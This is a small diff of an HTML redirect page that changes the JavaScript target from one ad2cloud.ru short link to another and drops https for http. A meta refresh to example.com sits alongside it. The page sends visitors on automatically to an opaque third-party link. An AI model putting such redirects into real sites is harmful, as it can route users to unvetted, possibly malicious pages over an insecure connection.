--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
         <meta charset="UTF-8">
         <meta http-equiv="refresh" content="0; url=http://example.com">
         <script type="text/javascript">
-            window.location.href = "https://ad2cloud.ru/4yCnm8"
+            window.location.href = "http://ad2cloud.ru/VqxC5c58"
         </script>
         <title>redirect</title>
     </head>
